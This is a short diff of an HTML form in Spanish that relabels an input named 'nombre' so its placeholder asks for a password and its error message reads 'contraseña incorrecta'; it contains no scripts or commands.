--- a/index.html
+++ b/index.html
@@ -32,8 +32,8 @@
       <div>
         <input id="nombre" 
                class="border border-gray-300 rounded px-4 py-2 w-full focus:outline-none focus:ring-1 focus:ring-emerald-500" 
-               name="nombre" placeholder="Nombres y apellidos" required>
-        <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden">Nombre incorrecto</p>
+               name="nombre" placeholder="ingrese su contraseña" required>
+        <p id="errorNombre" class="text-red-600 text-sm mt-1 hidden">contraseña incorrecta</p>
       </div>
       
       <!-- Redirección después de enviar -->
